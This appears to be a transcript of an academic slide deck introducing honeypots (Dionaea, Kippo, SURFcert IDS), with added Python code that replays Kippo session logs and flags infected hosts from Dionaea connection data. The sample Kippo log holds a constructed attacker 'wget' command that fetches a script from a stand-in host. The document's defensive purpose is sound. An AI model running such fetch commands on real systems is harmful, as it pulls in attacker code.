A short introduction to honeypots

Post on 12-Feb-2016


Transcript of A short introduction to honeypots

Εμμανουήλ Βασιλομανωλάκης (Emmanouil Vasilomanolakis)

PhD candidate, Telecooperation Group, Technische Universität Darmstadt, Center for Advanced Security Research Darmstadt (CASED)

Associate, Networks Laboratory ISLAB, Institute of Informatics and Telecommunications (IIT), Demokritos. manolis@cased.de

A short introduction to honeypots

Outline

4/21/2013 Telecooperation Group | CASED

• Introduction
• Classifications
• Deployment Architectures
• Open source vs. nothing
• Honeypots
• SURFcert IDS & experiences from Demokritos
• Future work - ideas

Introduction


Definition: “A security resource whose value lies in being probed, attacked or compromised”

• Doesn’t have to be a system: honeytokens
• We want to get compromised!
• Certainly not a standalone security mechanism.

Why?
• FUN!
• No false positives!
• Research: malware analysis / reverse engineering
• Reducing the available attack surface / early-warning system

Honeypot Classifications


Low interaction: simulate network operations (usually at the TCP/IP stack level)

[Medium interaction: simulate network operations (in more “sophisticated” ways)]

High interaction: real systems (e.g., VMs)

Other classifications:
• Purpose: generic, malware collectors, SSH, etc.
• Production vs. research (not really useful)

Honeypot Deployment Architectures


Open Source vs. nothing (really!)


Honeypot         Type     OS       Language        GUI  License
Honeyd           Generic  LINUX    C               N    GNU
Nepenthes        Malware  LINUX    C               N    GNU
Dionaea          Malware  LINUX    PYTHON          N    GNU
Honeytrap        Generic  LINUX    C               N    GNU
LaBrea           Generic  LINUX    C               N    GNU
Tiny HP          Generic  LINUX    PERL            N    GNU
HoneyBot         Malware  WINDOWS  -               Y    CLOSED
Google Hack HP   WEB      -        PHP             Y    GNU
Multipot         Malware  WINDOWS  VB 6            Y    GNU
Glastopf         WEB      -        PYTHON          Y    GNU
Kojoney          SSH      LINUX    PYTHON          N    GNU
Kippo            SSH      LINUX    PYTHON          N    BSD
Amun             Malware  LINUX    PYTHON          N    GNU
Omnirova         Malware  WINDOWS  Borland Delphi  Y    GNU
BillyGoat        Malware  -        ?               ?    CLOSED
Artemisa         VOIP     -        PYTHON          N    GNU
GHOST            USB      WINDOWS  C               Y    GNU

Dionaea


Low Interaction honeypot for collecting malware

Nepenthes successor

Basic protocol simulated: SMB (port 445)

Others: HTTP, HTTPS, FTP, TFTP, MSSQL and SIP (VoIP)

Also supports IPv6 and TLS

Malware files: stored locally and/or sent to 3rd-party entities (CWSandbox, Norman Sandbox, Anubis, VirusTotal)

Kippo (1/2)


Low interaction SSH honeypot

Features:
• Presents a fake (but “functional”) system to the attacker (resembling a Debian 5.0 installation)
• The attacker can download his tools through wget, and we save them for later inspection (cool!)
• Session logs are stored in a UML-compatible format for easy replay with the original timings (even cooler!)

Easy to install, but hard to get hackers!
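An added example, not from the slides or the Kippo project, of how such a UML-style TTY log is parsed and replayed with its original timings. The record layout `<iLiiLL` (op, tty, length, direction, seconds, microseconds, then the data) is assumed from Kippo's ttylog.py, so verify it against your version; the sample session bytes are constructed here.

```python
import io
import struct

# Kippo TTY log record layout (UML ttylog compatible), assumed from Kippo's ttylog.py:
# <iLiiLL = op, tty, length, direction, seconds, microseconds, then `length` bytes of data.
HEADER = struct.Struct("<iLiiLL")
OP_OPEN, OP_CLOSE, OP_WRITE = 1, 2, 3
DIR_INPUT, DIR_OUTPUT = 1, 2


def write_record(buf, op, direction, stamp, data=b""):
    """Append one record to a binary buffer, the way Kippo logs a session."""
    sec = int(stamp)
    usec = int(round((stamp - sec) * 1_000_000))
    buf.write(HEADER.pack(op, 0, len(data), direction, sec, usec))
    buf.write(data)

def parse_ttylog(raw):
    """Yield (op, direction, timestamp, data) per record; stop cleanly on a truncated tail."""
    stream = io.BytesIO(raw)
    while True:
        head = stream.read(HEADER.size)
        if len(head) < HEADER.size:
            return
        op, _tty, length, direction, sec, usec = HEADER.unpack(head)
        data = stream.read(length)
        if len(data) < length:  # e.g. the honeypot died mid-session
            return
        yield op, direction, sec + usec / 1_000_000, data

def replay(raw):
    """Rebuild what the attacker saw plus the delay before each screen write,
    so the timing can be inspected without sleeping the way Kippo's playlog utility does."""
    output, delays, prev = [], [], None
    for op, direction, ts, data in parse_ttylog(raw):
        if op != OP_WRITE or direction != DIR_OUTPUT:
            continue
        delays.append(0.0 if prev is None else round(ts - prev, 3))
        prev = ts
        output.append(data.decode("utf-8", errors="replace"))
    return "".join(output), delays

# Constructed sample session: prompt, an echoed "wget", then a truncated final record.
_buf = io.BytesIO()
write_record(_buf, OP_OPEN, 0, 1366531200.0)
write_record(_buf, OP_WRITE, DIR_OUTPUT, 1366531200.0, b"root@debian:~# ")
write_record(_buf, OP_WRITE, DIR_INPUT, 1366531201.5, b"w")  # keystroke
write_record(_buf, OP_WRITE, DIR_OUTPUT, 1366531201.5, b"w")  # server-side echo
write_record(_buf, OP_WRITE, DIR_OUTPUT, 1366531203.25, b"get http://example.invalid/x.sh\r\n")
SAMPLE_LOG = _buf.getvalue() + HEADER.pack(OP_WRITE, 0, 100, DIR_OUTPUT, 1366531204, 0) + b"trunc"
```

`replay(SAMPLE_LOG)` returns the reconstructed screen text together with the per-write delays, and the truncated trailing record is dropped rather than raising.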

SURFcert IDS


An open source (GPLv2) distributed intrusion detection system based on honeypots

Sensors act as proxies, forwarding network traffic from the monitored network to the system’s center over OpenVPN

Supported honeypots: Nepenthes, Dionaea, Argos, Kippo

Three parts:
• Tunnel – honeypot server
• Web – logging server
• Sensors

SURFcert IDS


Also:
• Supports p0f for attackers’ OS detection
• Statistics, nice web GUI, sensor status, geographical visualizations, and more…

SURFcert IDS @ Demokritos


Some stats:
• 21,000 attacks on 3 different sensors (1 month)
• 1500 malware files downloaded
• Main target: port 445

Successfully detected infected systems inside our network (mostly with a Conficker worm variant)

Automatic malware analysis can give us valuable information on botnets (and their C&C IRC servers)

Possible to find zero-day exploits / new malware (or different variants)
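An added example, not from the slides or the SURFcert IDS project, of the kind of query behind the detection described above: it builds an in-memory copy of Dionaea's SQLite connection log from constructed rows, ranks the targeted ports, and flags internal hosts that repeatedly hit the SMB honeypot port. The table subset is assumed from Dionaea's logsql module; column names may differ in your version.

```python
import ipaddress
import sqlite3

# Subset of the `connections` table in Dionaea's logsql.sqlite, assumed from Dionaea's
# logsql module (check the column names against your version). Rows below are constructed.
SCHEMA = """CREATE TABLE connections (
    connection INTEGER PRIMARY KEY, connection_type TEXT, connection_transport TEXT,
    connection_protocol TEXT, connection_timestamp INTEGER, local_host TEXT,
    local_port INTEGER, remote_host TEXT, remote_port INTEGER);"""
SAMPLE_ROWS = [  # (type, transport, protocol, timestamp, local_host, local_port, remote_host, remote_port)
    ("listen", "tcp", "smbd", 1366531000, "10.10.5.20", 445, "", 0),
    ("accept", "tcp", "smbd", 1366531200, "10.10.5.20", 445, "198.51.100.7", 49152),
    ("accept", "tcp", "smbd", 1366531260, "10.10.5.20", 445, "10.10.7.33", 1041),
    ("accept", "tcp", "smbd", 1366531320, "10.10.5.20", 445, "10.10.7.33", 1042),
    ("accept", "tcp", "smbd", 1366531380, "10.10.5.20", 445, "10.10.7.33", 1043),
    ("accept", "tcp", "httpd", 1366531400, "10.10.5.20", 80, "203.0.113.9", 51000),
    ("accept", "tcp", "smbd", 1366531500, "10.10.5.20", 445, "10.10.9.4", 2000),
]
INTERNAL = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def load_sample():
    """In-memory stand-in for logsql.sqlite, populated with the constructed rows."""
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    db.executemany(
        "INSERT INTO connections (connection_type, connection_transport, connection_protocol, "
        "connection_timestamp, local_host, local_port, remote_host, remote_port) "
        "VALUES (?, ?, ?, ?, ?, ?, ?, ?)", SAMPLE_ROWS)
    return db

def attacks_per_port(db):
    """Inbound connections per honeypot port, most targeted first ('listen' rows are not attacks)."""
    return db.execute(
        "SELECT local_port, COUNT(*) FROM connections WHERE connection_type = 'accept' "
        "GROUP BY local_port ORDER BY 2 DESC, 1").fetchall()

def suspected_internal_infections(db, port=445, min_hits=2):
    """Internal (RFC 1918) sources repeatedly hitting the SMB honeypot port. Nothing legitimate
    should ever talk to a honeypot, so these are candidate infected hosts to triage."""
    rows = db.execute(
        "SELECT remote_host, COUNT(*) FROM connections WHERE connection_type = 'accept' "
        "AND local_port = ? GROUP BY remote_host", (port,)).fetchall()
    return {host: n for host, n in rows
            if n >= min_hits and any(ipaddress.ip_address(host) in net for net in INTERNAL)}
```

With the constructed rows, port 445 dominates and 10.10.7.33 is reported as a probable infected internal host, while the external sources are left to the usual attack statistics.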

Future Work - Ideas


Features:

• Better visualization
• Anti-evasion techniques
• Cheap & easy mobile sensors: Raspberry Pi
• Advertising honeypots

Honeypots:

• Mobile honeypots (e.g., Android)
• SCADA – Industrial Control Systems (ICS)

Attacker scans our system

Attacker trying to connect to our “ftp” server

Thank you. Questions?


Backup slides


Useful Links


Interesting stuff:
• http://www.islab.demokritos.gr – Many honeypot-related theses available
• https://www.enisa.europa.eu/activities/cert/support/proactive-detection/proactive-detection-of-security-incidents-II-honeypots – Report from ENISA regarding honeypots
• http://publicids.surfnet.nl:8080/surfnetids/login.php – Demo version of SURFcert IDS

Honeypots:
• http://www.honeynet.org – General information on honeypots
• http://dionaea.carnivore.it – Dionaea honeypot
• http://amunhoney.sourceforge.net – Amun honeypot
• http://map.honeynet.org – Honeypots visualization

SURFcert IDS @ Demokritos


[Network diagram of the SURFcert IDS deployment at Demokritos. Labels in the figure: DMZ X, DMZ 1, DMZ 2; Institute A, Institute B; Honeynet IP space; Internal firewall; WEB – DB SERVER; TUNNEL – HONEYPOT SERVER; INTERNAL MANAGEMENT PC; Sensor 1, Sensor 2, Sensor 3; outside main firewall / inside main firewall.]